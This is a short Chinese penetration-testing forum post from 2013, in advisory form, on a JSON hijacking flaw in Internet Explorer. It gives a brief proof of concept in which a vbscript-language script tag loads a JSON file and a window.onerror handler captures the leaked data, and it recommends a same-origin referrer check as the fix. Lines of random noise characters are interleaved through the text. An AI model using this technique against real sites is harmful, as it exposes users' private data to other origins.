中国网络渗透测试联盟
标题:
IE通用JSON劫持漏洞
[打印本页]
作者:
admin
时间:
2013-2-23 11:33
标题:
IE通用JSON劫持漏洞
简要描述:
' B- y' i3 s0 r: z- T4 a
8 P9 Y! b! t4 E, M
由于某些资源容器对数据处理不当导致json劫持漏洞.
' {, y1 `* _3 y' L0 ^! Y M! t1 d
详细说明:
A/ [# X6 [$ K
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
. T. |3 d! w5 S( w1 Y$ G8 G- `
<script language=vbscript></script>
* A8 G1 T- n% Q( @% G
! V8 H! _: i/ u4 H# Y: D! L3 T
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
# U3 F) C- D! r; ?* A- \
漏洞证明:
4 ]6 K3 W2 t( D, `2 ]4 o0 X
<script>
9 W! S0 w9 ]& R0 z% B
window.onerror=function(_){
6 |9 r; S* i/ m
alert(_)
2 @% @3 p' C! j7 G4 D
}
u r* d3 S9 k5 {) |
</script>
7 I e0 n- c% E3 _# P; G* J2 ~
<script language=vbscript src=1.json></script>
6 z1 K8 l6 e1 B
' ?, |. T, a0 K0 X
" h6 o5 `* a" S+ y
1.json:
4 `: {: U& Z4 k: _. }- w1 C
[{"name":"sogili","age":19}]
8 H. U) X6 { ^4 y }$ D" Q
修复方案:
% K" H: |6 n4 @
网站业务对于这个问题可以通过验证referrer是否为同源来防御
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2